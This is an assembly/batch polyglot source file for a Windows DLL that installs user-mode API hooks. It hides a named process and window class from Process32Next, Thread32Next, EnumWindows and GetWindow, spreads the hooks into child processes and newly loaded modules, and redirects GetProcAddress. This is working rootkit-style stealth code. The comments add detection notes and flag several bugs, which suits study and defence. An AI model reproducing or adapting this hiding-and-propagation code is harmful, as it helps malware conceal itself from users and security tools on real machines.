;@GOTO TRANSLATE
; Polyglot source: this one file is both a cmd.exe batch script and MASM input.
; cmd.exe treats a leading ';' as a token delimiter, so the line above executes
; as '@GOTO TRANSLATE' and jumps to the build commands placed after 'END DllMain';
; MASM sees the same line as a comment. Nothing below this line is ever run by
; cmd.exe, and nothing after 'END' is ever assembled.
;
; What this module is: a 32-bit DLL that installs user-mode API hooks (through
; the ApiHooks library included below) so that one process image (sProc2Hide)
; and one window class (sWind2Hide) are left out of the results of
; Process32Next, Thread32Next, EnumWindows and GetWindow, and so that the same
; hooks are pushed into every child process and every newly loaded module.
; Defender notes (from the code in this file): children are created
; CREATE_SUSPENDED, hooked, then resumed; GetProcAddress answers with addresses
; inside this DLL for the hooked names; the image exports a single NONAME
; ordinal and has .idata/.rdata merged into .text (see the build section).
.586P
.MODEL FLAT, STDCALL                    ; every PROC below: stack arguments, result in EAX, callee pops
OPTION CASEMAP: NONE
INCLUDE WINDOWS.inc
UNICODE = FALSE                         ; presumably selects the ANSI (A) variants in the macro files
INCLUDE APIMACRO.mac                    ; source of iWin32/iWin32i/iWin32j/sWin32/TEXTA etc. - not shown on this page
INCLUDE ApiHooks.inc                    ; source of API_HOOK, MkHook/BeginHooks/EndHooks, EstablishApiHooksA - not shown
INCLUDELIB iKERNEL32.lib
INCLUDELIB iUSER32.lib
INCLUDELIB iApiHooks.lib
;------------------------------------------------------------------
.DATA?
CurPID DWORD ?                          ; PID of the process this DLL lives in (written once in DllMain)
OrigEnumWinProc DWORD ?                 ; caller's EnumWindows callback while NewEnumWindows is active, 0 otherwise
prinfo PROCESS_INFORMATION <>           ; scratch PROCESS_INFORMATION shared by NewLoadModule and NewWinExec (no synchronisation)
stinfo STARTUPINFO <>                   ; scratch STARTUPINFO for the same two hooks; .cb is filled in DllMain
PathHooks SIGN MAX_PATH DUP (?)         ; this DLL's own path (GetModuleFileName in DllMain); passed to EstablishApiHooksA
                                        ; SIGN is presumably a byte-sized type from the included macro files - confirm
; Parameter block handed to LoadModule (same layout as the Win32 LOADPARMS32):
; NewLoadModule reads lpCmdShow as two WORDs {2, nCmdShow} and lpCmdLine as a
; length-prefixed string.
LOADPARMS32 STRUCT
lpEnvAddress LPSTR ?                    ; environment block, forwarded to CreateProcessA as lpEnvironment
lpCmdLine LPSTR ?                       ; first byte = length, text follows
lpCmdShow LPSTR ?                       ; -> WORD[2]: {2, nCmdShow}
dwReserved DWORD ?
LOADPARMS32 ENDS
.CODE
ALIGN 4
; Hook table. DynaHooks is a header row (HOOKS_DYNAMIC) immediately followed by
; the rows declared between BeginHooks and EndHooks. The table label 'Invisible'
; is the DLL's only export (ordinal 1, NONAME - see the build section) and is
; presumably what EstablishApiHooksA consumes. PrepareDynamic writes into the
; ModuleImport field of the rows after DynaHooks at run time, i.e. this table
; sits in the code section and is modified while running (see the note there).
; MkHook arguments read as <replacement>, <module>, <api>; a blank module appears
; to mean KERNEL32 and a blank replacement presumably defaults to New<api>,
; which matches the PROC names in this file. The fourth (flags) argument is
; commented out on every row.
DynaHooks API_HOOK <HOOKS_DYNAMIC>
BeginHooks Invisible
MkHook , , CreateProcessA;, HOOK_ALL+HOOK_HARD
MkHook , , LoadModule;, HOOK_ALL+HOOK_HARD
MkHook , , WinExec;, HOOK_ALL+HOOK_HARD
MkHook , , LoadLibraryA;, HOOK_ALL+HOOK_HARD
MkHook , , LoadLibraryExA;, HOOK_ALL+HOOK_HARD
MkHook , , GetProcAddress;, HOOK_ALL+HOOK_HARD
MkHook , , Process32Next;, HOOK_ALL+HOOK_HARD
MkHook , , Thread32Next;, HOOK_ALL+HOOK_HARD
MkHook ,USER32, EnumWindows;, HOOK_ALL+HOOK_HARD
MkHook ,USER32, GetWindow;, HOOK_ALL+HOOK_HARD
NoHooks = ($-Invisible)/API_HOOK        ; number of rows above (10); used as the loop count in PrepareDynamic
EndHooks
; String constants. TEXTA NAME, <text/0> defines a NUL-terminated ANSI string
; that the code references as sNAME (sKERNEL32, sProc2Hide, ...); the '/0'
; inside the brackets is presumably the terminator notation of the macro.
TEXTA KERNEL32, <KERNEL32.dll/0>        ; module name compared in NewGetProcAddress
TEXTA USER32, <USER32.dll/0>            ; defined but not referenced in this file as sUSER32
TEXTA CreateProcessA, <CreateProcessA/0>   ; the ten API names below are matched by CmpApi in NewGetProcAddress
TEXTA LoadModule, <LoadModule/0>
TEXTA WinExec, <WinExec/0>
TEXTA LoadLibraryA, <LoadLibraryA/0>
TEXTA LoadLibraryExA, <LoadLibraryExA/0>
TEXTA GetProcAddress, <GetProcAddress/0>
TEXTA Process32Next, <Process32Next/0>
TEXTA Thread32Next, <Thread32Next/0>
TEXTA EnumWindows, <EnumWindows/0>
TEXTA GetWindow, <GetWindow/0>
TEXTA Proc2Hide, <Calc.exe/0>           ; image name dropped from Process32Next results (case-insensitive compare)
TEXT Wind2Hide, <SciCalc/0>             ; window CLASS name (passed as lpClassName to FindWindow) hidden from
                                        ; EnumWindows/GetWindow; its owning process is hidden from Thread32Next.
                                        ; TEXT rather than TEXTA here; with UNICODE = FALSE presumably equivalent.
;------------------------------------------------------------------
;------------------------------------------------------------------
; BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
; Image entry point ('END DllMain'). Written as a bare label, not a PROC, so
; the stack is exactly as the loader left it: [ESP+4]=hinstDLL,
; [ESP+8]=fdwReason, [ESP+12]=lpReserved.
; On DLL_PROCESS_ATTACH it records the host PID, sets stinfo.cb and stores this
; DLL's own path in PathHooks, which is later handed to EstablishApiHooksA for
; every child process. Returns TRUE for every reason. Only scratch registers
; are written directly here; what the call macros clobber is not visible.
DllMain:
CMP DWORD PTR [ESP+8], DLL_PROCESS_ATTACH
JNE @F
iWin32 GetCurrentProcessId
MOV CurPID, EAX
MOV stinfo.cb, SIZEOF STARTUPINFO
; [ESP+12] below is hinstDLL, not lpReserved: this relies on the macro having
; already pushed the two arguments to its right (right-to-left order) before
; this operand is evaluated, which moves ESP down by 8 - TODO confirm in APIMACRO.mac.
iWin32i GetModuleFileName, [ESP+12], OFFSET PathHooks, MAX_PATH
@@:
PUSH TRUE                               ; EAX = TRUE via the short PUSH/POP idiom
POP EAX
RETN 12                                 ; stdcall: pop the three DWORD arguments
;Helper part-----------
;------------------------------------------------------------------
;------------------------------------------------------------------
; BOOL NewCreateProcessA(<the ten CreateProcessA arguments>)
; Replacement for CreateProcessA. The child is always started with
; CREATE_SUSPENDED so the hook table can be installed into it (via this DLL's
; path in PathHooks) before its first instruction; if the caller did not ask
; for a suspended child it is resumed afterwards. Returns CreateProcessA's
; result in EAX; on failure (0) nothing else is done.
; Process telemetry sees this as: child created suspended, hooks/DLL applied
; to the child from the parent, then ResumeThread from the parent.
; Registers: the result (EAX) and callee-saved EBX are kept across the calls
; with PUSHp/POPc, which presumably push/pop the listed registers in order.
NewCreateProcessA PROC lpApplicationName, lpCommandLine,\
lpProcessAttributes, lpThreadAttributes,\
bInheritHandles, dwCreationFlags, \
lpEnvironment, lpCurrentDirectory,\
lpStartupInfo, lpProcessInformation
MOV EAX, dwCreationFlags
OR EAX, CREATE_SUSPENDED                ; force a suspended start; the caller's flags stay in dwCreationFlags
iWin32 CreateProcessA, lpApplicationName, lpCommandLine,\
lpProcessAttributes, lpThreadAttributes,\
bInheritHandles, EAX,\
lpEnvironment, lpCurrentDirectory,\
lpStartupInfo, lpProcessInformation
TEST EAX, EAX
JE @Failed                              ; propagate failure unchanged
PUSHp EAX, EBX                          ; keep the BOOL result and EBX across the calls below
MOV EBX, lpProcessInformation
ASSUME EBX: PTR PROCESS_INFORMATION
iWin32 EstablishApiHooksA, OFFSET PathHooks, [EBX].dwProcessId   ; hook the child before it runs
TEST dwCreationFlags, CREATE_SUSPENDED  ; did the caller want a suspended child itself?
JNE @F                                  ; yes: leave it suspended as requested
iWin32 ResumeThread, [EBX].hThread      ; no: undo the forced suspension
@@:
POPc EAX, EBX
@Failed:
RET                                     ; PROC epilogue: restore EBP, pop the ten arguments (stdcall)
NewCreateProcessA ENDP
;------------------------------------------------------------------
;------------------------------------------------------------------
; DWORD NewLoadModule(LPCSTR lpModuleName, LPVOID lpParameterBlock)
; Replacement for LoadModule. Unpacks the LOADPARMS32 block, starts the module
; itself with CreateProcessA (suspended), installs the hooks in the new
; process, resumes it and returns 32 (LoadModule's success range is > 31).
; If the parameter block does not start with the expected WORD 2, or
; CreateProcessA fails, the frame is dropped and control is handed to the
; original LoadModule so its own result reaches the caller.
; Uses the shared stinfo/prinfo globals; concurrent callers would race on them.
NewLoadModule PROC lpModuleName, lpParameterBlock
MOV EAX, lpParameterBlock
ASSUME EAX: PTR LOADPARMS32
MOV ECX, [EAX].lpCmdShow                ; ECX -> WORD[2]: {2, nCmdShow}
MOV EDX, [EAX].lpCmdLine                ; EDX -> length-prefixed command line
CMP WORD PTR [ECX], 2                   ; first WORD must be 2; otherwise let the original decide
JNE @Fail
MOV CX, [ECX+2]                         ; nCmdShow
CMP BYTE PTR [EDX], 0                   ; empty command line? (the MOVs below keep these flags)
MOV stinfo.wShowWindow, CX
MOV ECX, 0                              ; lpCommandLine = NULL for the empty case; MOV rather than XOR so the flags survive
JE @F
LEA ECX, [EDX+1]                        ; skip the length byte
@@:
iWin32 CreateProcessA, lpModuleName, ECX, \
NULL, NULL, FALSE, CREATE_SUSPENDED,\
[EAX].lpEnvAddress, NULL,\
OFFSET stinfo, OFFSET prinfo
TEST EAX, EAX
JNE @F
@Fail:
LEAVE                                   ; discard this PROC's frame, leaving the caller's arguments in place...
iWin32j LoadModule                      ; ...and tail-jump to the original (presumably what the 'j' form does)
@@:
iWin32 EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId   ; hook the child while it is still suspended
iWin32 CloseHandle, prinfo.hProcess
iWin32 ResumeThread, prinfo.hThread     ; only now does the child start running
iWin32 CloseHandle, prinfo.hThread
MOV EAX, 32                             ; LoadModule success value
RET
NewLoadModule ENDP
;------------------------------------------------------------------
;------------------------------------------------------------------
; UINT NewWinExec(LPCSTR lpszCmdLine, UINT fuCmdShow)
; Replacement for WinExec. Starts the command line with CreateProcessA
; (suspended), installs the hooks into the new process, resumes it and
; returns 32 (WinExec's success range is > 31). If CreateProcessA fails the
; frame is dropped and the original WinExec is tail-jumped to instead.
; Uses the shared stinfo/prinfo globals; concurrent callers would race on them.
NewWinExec PROC lpszCmdLine, fuCmdShow
MOV EAX, fuCmdShow
MOV stinfo.wShowWindow, AX              ; low WORD of fuCmdShow
iWin32 CreateProcessA, NULL, lpszCmdLine, \
NULL, NULL, FALSE, CREATE_SUSPENDED,\
NULL, NULL,\
OFFSET stinfo, OFFSET prinfo
TEST EAX, EAX
JNE @F
LEAVE                                   ; drop the frame...
iWin32j WinExec                         ; ...and let the original handle the failure case
@@:
iWin32 EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId   ; hook the child while suspended
iWin32 CloseHandle, prinfo.hProcess
iWin32 ResumeThread, prinfo.hThread
iWin32 CloseHandle, prinfo.hThread
MOV EAX, 32                             ; WinExec success value
RET
NewWinExec ENDP
;------------------------------------------------------------------
;------------------------------------------------------------------
; FARPROC NewGetProcAddress(HMODULE hLibrary, LPCSTR lpszProc)
; Replacement for GetProcAddress. When one of the hooked KERNEL32 APIs is
; looked up by name, returns the address of the matching New* PROC in this
; DLL, so imports resolved at run time are redirected as well; every other
; lookup (ordinals, other modules, other names) is tail-jumped to the original.
; Detection: GetProcAddress returning an address outside the module whose
; handle was passed in - here, inside this DLL - is a direct indicator.
NewGetProcAddress PROC hLibrary, lpszProc
CMP lpszProc, 10000H                    ; ordinal lookup (HIWORD == 0)? unsigned compare, hence JB
JB @GoGPA
iWin32 GetModuleHandleA, sKERNEL32
CMP EAX, hLibrary
JNE @GoUser32
; CmpApi NAME: if lpszProc equals the string sNAME, return the address of
; NewNAME. Defined inside the PROC and expanded in place for each name below.
CmpApi MACRO __ApiNomen
iWin32 lstrcmp, lpszProc, s&__ApiNomen
TEST EAX, EAX                           ; lstrcmp result 0 means the names are equal
JNE @F
MOV EAX, New&__ApiNomen
JMP @RetGPA
@@:
ENDM
CmpApi CreateProcessA
CmpApi LoadModule
CmpApi WinExec
CmpApi LoadLibraryA
CmpApi LoadLibraryExA
CmpApi GetProcAddress
CmpApi Process32Next
CmpApi Thread32Next
JMP @GoGPA                              ; KERNEL32 name not in the list: pass through
@GoUser32:
; NOTE(review): this branch resolves sKERNEL32 again rather than sUSER32, so
; the compare below is against the KERNEL32 handle that the JNE above already
; rejected; as written the two USER32 entries that follow are not reached.
iWin32 GetModuleHandleA, sKERNEL32
CMP EAX, hLibrary
JNE @GoGPA
CmpApi EnumWindows
CmpApi GetWindow
@GoGPA:
LEAVE                                   ; drop the frame and tail-jump to the original GetProcAddress
iWin32j GetProcAddress
@RetGPA:
RET                                     ; EAX = address of a New* hook in this DLL
NewGetProcAddress ENDP
;------------------------------------------------------------------
;------------------------------------------------------------------
; void PrepareDynamic(LPCSTR lpLibFileName)      - internal, called via sWin32
; Writes lpLibFileName into the ModuleImport field of every hook row after the
; DynaHooks header (NoHooks rows, starting at DynaHooks + API_HOOK, i.e. at
; 'Invisible'), so that a following EstablishApiHooksA(OFFSET DynaHooks, CurPID)
; presumably targets the module that was just loaded. No return value;
; EAX, ECX and EDX are written.
; NOTE(review): the rows live in the .CODE section, so this is a run-time write
; into the image's code section. It can only succeed if that section is
; writable; the build line merges .idata into .text, which presumably leaves
; .text with write permission. A writable+executable .text section is a
; static characteristic of this image worth flagging.
PrepareDynamic PROC lpLibFileName
MOV EAX, lpLibFileName
MOV ECX, NoHooks                        ; row count (constant 10 in this file)
JECXZ Fin                               ; defensive; never taken with the table above
MOV EDX, OFFSET DynaHooks ;Invisible - API_HOOK
@@:
ADD EDX, API_HOOK                       ; advance first, so the header row itself is skipped
MOV (API_HOOK PTR [EDX]).ModuleImport, EAX
LOOP @B
Fin:
RET
PrepareDynamic ENDP
;------------------------------------------------------------------
;------------------------------------------------------------------
; HMODULE NewLoadLibraryA(LPCSTR lpLibFileName)
; Replacement for LoadLibraryA. Loads the module with the original API and, on
; success, points the DynaHooks table at that module name and applies the
; table to this process (CurPID), so the new module's own imports of the
; hooked APIs are redirected too. Returns the original's HMODULE, preserved
; across the two calls with PUSH/POP; a 0 result is passed through untouched.
NewLoadLibraryA PROC lpLibFileName
iWin32 LoadLibraryA, lpLibFileName
TEST EAX, EAX
JE @F                                   ; load failed: return 0 as-is
PUSH EAX                                ; keep the HMODULE
sWin32 PrepareDynamic, lpLibFileName    ; sWin32 presumably makes a stdcall to a local symbol
iWin32 EstablishApiHooksA, OFFSET DynaHooks, CurPID
POP EAX
@@:
RET
NewLoadLibraryA ENDP
;------------------------------------------------------------------
;------------------------------------------------------------------
; HMODULE NewLoadLibraryExA(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags)
; Replacement for LoadLibraryExA; same behaviour as NewLoadLibraryA, except
; that loads whose dwFlags equal exactly DONT_RESOLVE_DLL_REFERENCES or
; exactly LOAD_LIBRARY_AS_DATAFILE are returned without hooking (the module
; is not mapped as code in those cases). Note these are equality checks, not
; bit tests, so a combination of flags is still hooked.
NewLoadLibraryExA PROC lpLibFileName, hFile, dwFlags
iWin32 LoadLibraryExA, lpLibFileName, hFile, dwFlags
TEST EAX, EAX
JE @F                                   ; load failed: return 0 as-is
CMP dwFlags, DONT_RESOLVE_DLL_REFERENCES
JE @F
CMP dwFlags, LOAD_LIBRARY_AS_DATAFILE
JE @F
PUSH EAX                                ; keep the HMODULE
sWin32 PrepareDynamic, lpLibFileName    ; retarget the dynamic hook table at this module
iWin32 EstablishApiHooksA, OFFSET DynaHooks, CurPID
POP EAX
@@:
RET
NewLoadLibraryExA ENDP
;------------------------------------------------------------------
;Executive part
; BOOL NewProcess32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lpProcEntry32)
; Replacement for Process32Next. Calls the original and, while the returned
; entry's szExeFile (the part after its last '\') equals sProc2Hide
; case-insensitively, calls it again so that entry is never reported. Returns
; the original's result (0 at end of snapshot or on error). EAX and EDX are
; written directly; the call macros may clobber more.
; Detection: a hook like this shows up as a difference between the ToolHelp
; view and any independent enumeration of the same processes.
NewProcess32Next PROC hSnapshot, lpProcEntry32
Nochmals:                               ; 'again': re-entered whenever an entry is suppressed
iWin32 Process32Next, hSnapshot, lpProcEntry32
TEST EAX, EAX
JE Fin                                  ; no more entries: return 0
PUSH EAX                                ; keep the BOOL result across the compare
MOV EAX, lpProcEntry32
ADD EAX, PROCESSENTRY32.szExeFile       ; EAX -> szExeFile[0]
; Walk to the terminating NUL, remembering in EDX the position after the last '\'.
@@:
CMP BYTE PTR [EAX], 0
JE @F
CMP BYTE PTR [EAX], "\"
JE @Fond
INC EAX
JMP @B
@Fond:                                  ; separator found
INC EAX
MOV EDX, EAX                            ; candidate start of the bare file name
JMP @B
@@:
; NOTE(review): EDX is assigned only when a '\' was seen. If szExeFile holds a
; bare name with no path separator, EDX still contains whatever the
; Process32Next call above left in it, and that is what is passed to lstrcmpiA.
iWin32 lstrcmpiA, EDX, sProc2Hide
TEST EAX, EAX                           ; 0 means the names are equal
POP EAX                                 ; restore the result; POP leaves the flags alone
JE Nochmals                             ; hidden entry: fetch the next one instead
Fin:
RET
NewProcess32Next ENDP
;--------------------------------------------------------------------------------
;--------------------------------------------------------------------------------
; BOOL NewThread32Next(HANDLE hSnapshot, LPTHREADENTRY32 lpThreadEntry32)
; Replacement for Thread32Next. Skips every thread whose th32OwnerProcessID is
; the process owning the sWind2Hide window (looked up with FindWindow on each
; iteration); when that window does not exist nothing is filtered. Returns the
; original's result, parked in EBX (callee-saved; saved/restored by USES).
NewThread32Next PROC USES EBX, hSnapshot, lpThreadEntry32
Nochmals:                               ; 'again': re-entered whenever a thread is suppressed
iWin32 Thread32Next, hSnapshot, lpThreadEntry32
TEST EAX, EAX
MOV EBX, EAX                            ; remember the result; MOV keeps the flags for the JE
JE Fin
iWin32i FindWindow, sWind2Hide, NULL    ; lpClassName = sWind2Hide, lpWindowName = NULL
TEST EAX, EAX
JE Fin                                  ; hidden window absent: report the thread as-is
PUSH ECX                                ; reserve one DWORD on the stack to receive the PID
iWin32 GetWindowThreadProcessId, EAX, ESP   ; ESP = address of that slot (assumes the macro pushes right to left with nothing pushed before it)
MOV ECX, lpThreadEntry32
POP EAX                                 ; EAX = PID owning the hidden window
CMP EAX, (THREADENTRY32 PTR [ECX]).th32OwnerProcessID
JE Nochmals                             ; thread belongs to the hidden process: fetch the next one
Fin:
MOV EAX, EBX
RET
NewThread32Next ENDP
;--------------------------------------------------------------------------------
;--------------------------------------------------------------------------------
; BOOL NewEnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam)
; Replacement for EnumWindows. Parks the caller's callback in the global
; OrigEnumWinProc and enumerates with NewEnumProc instead, which drops the
; hidden window before forwarding each HWND to the caller. If OrigEnumWinProc
; is already occupied (nested or concurrent call) the original EnumWindows is
; called unfiltered. Returns EnumWindows' result in EAX.
; NOTE(review): OrigEnumWinProc is one unsynchronised global, so two threads
; enumerating at the same time would share a single callback slot.
NewEnumWindows PROC lpEnumFunc, lParam
CMP OrigEnumWinProc, NULL
JE @F
iWin32 EnumWindows, lpEnumFunc, lParam  ; slot busy: pass through unfiltered
RET
@@:
PUSH lpEnumFunc                         ; OrigEnumWinProc = lpEnumFunc (memory-to-memory through the stack)
POP OrigEnumWinProc
iWin32 EnumWindows, NewEnumProc, lParam
AND OrigEnumWinProc, NULL               ; release the slot; EAX (the result) is not touched
RET
NewEnumWindows ENDP
; BOOL CALLBACK NewEnumProc(HWND hwnd, LPARAM lParam)
; Callback installed by NewEnumWindows. When hwnd is the sWind2Hide window it
; returns TRUE (continue) without forwarding; otherwise it forwards to the
; caller's callback stored in OrigEnumWinProc and returns that result.
; ESI is listed in USES but is not otherwise used in this PROC.
NewEnumProc PROC USES ESI, hwnd, lParam
iWin32i FindWindow, sWind2Hide, NULL
TEST EAX, EAX
JE OrigEnumP                            ; no hidden window: forward unchanged
CMP EAX, hwnd                           ; is this the hidden window? (PUSH/POP below keep the flags)
PUSH TRUE
POP EAX                                 ; EAX = TRUE, prepared for the hidden case
JE @F                                   ; hidden: swallow it and keep enumerating
OrigEnumP:
sWin32 OrigEnumWinProc, hwnd, lParam    ; indirect call through the saved callback
@@:
RET
NewEnumProc ENDP
;--------------------------------------------------------------------------------
;--------------------------------------------------------------------------------
; HWND NewGetWindow(HWND hWnd, UINT uCmd)
; Replacement for GetWindow. Removes the sWind2Hide window from relationship
; walks: a result equal to it is skipped by walking one more step, a GW_CHILD
; query on it returns NULL, and any other query relative to it is re-based on
; its own GetWindow result. If the hidden window does not exist the call is
; passed straight through. Returns the HWND in EAX; EBX (the hidden HWND) is
; saved/restored by USES.
NewGetWindow PROC USES EBX, hWnd, uCmd
iWin32i FindWindow, sWind2Hide, NULL
TEST EAX, EAX
JE NotMe                                ; no hidden window: plain pass-through
MOV EBX, EAX                            ; EBX = hidden HWND
CMP EAX, hWnd
JNE NotMe                               ; query is about some other window
CMP uCmd, GW_CHILD
JNE @F
SUB EAX, EAX                            ; the hidden window reports no children
RET
@@:
iWin32 GetWindow, EAX, uCmd             ; query relative to the hidden window itself...
Next:
MOV hWnd, EAX                           ; ...and continue the walk from that result
; NOTE(review): when hWnd is the hidden window this path issues two GetWindow
; calls in a row (the one just above and the one at NotMe), so the caller
; receives the window two steps away rather than the hidden window's direct
; neighbour.
NotMe:
iWin32 GetWindow, hWnd, uCmd
TEST EAX, EAX
JE Fin                                  ; NULL: nothing to skip
; EBX is assigned only when the hidden window exists; on the first 'JE NotMe'
; above it still holds the caller's EBX value, and that is what is compared here.
CMP EAX, EBX                            ; landed on the hidden window?
JE Next                                 ; yes: step over it
Fin:
RET
NewGetWindow ENDP
;------------------------------------------------------------------
END DllMain
:TRANSLATE
REM Build section. Reached through the '@GOTO TRANSLATE' on the file's first line
REM when this file is run as a batch script; MASM stops at 'END DllMain' above,
REM so nothing from here on is ever assembled.
@ECHO OFF
REM Assemble this very file (despite the .bat extension) into a COFF object.
ML /c /coff /nologo Invisible.bat
REM Link as a DLL that exports only the hook table 'Invisible', by ordinal 1 and
REM NONAME, with .rdata and .idata merged into .text (the merge is what lets
REM PrepareDynamic write into the hook table at run time, presumably).
REM NOTE(review): 'REM' is fused to the /IGNORE value on this line ("4086REM"),
REM so the linker receives it as part of that option rather than as a comment.
eLINK Invisible /nologo /DLL /EXPORT:Invisible,@1,NONAME /SUBSYSTEM:WINDOWS /MERGE:.rdata=.text /MERGE:.idata=.text /IGNORE:4078,4086REM /BASE:0X77240000
REM Remove the intermediate files; only Invisible.dll is kept.
DEL Invisible.obj
DEL Invisible.exp
DEL Invisible.lib
pause
cls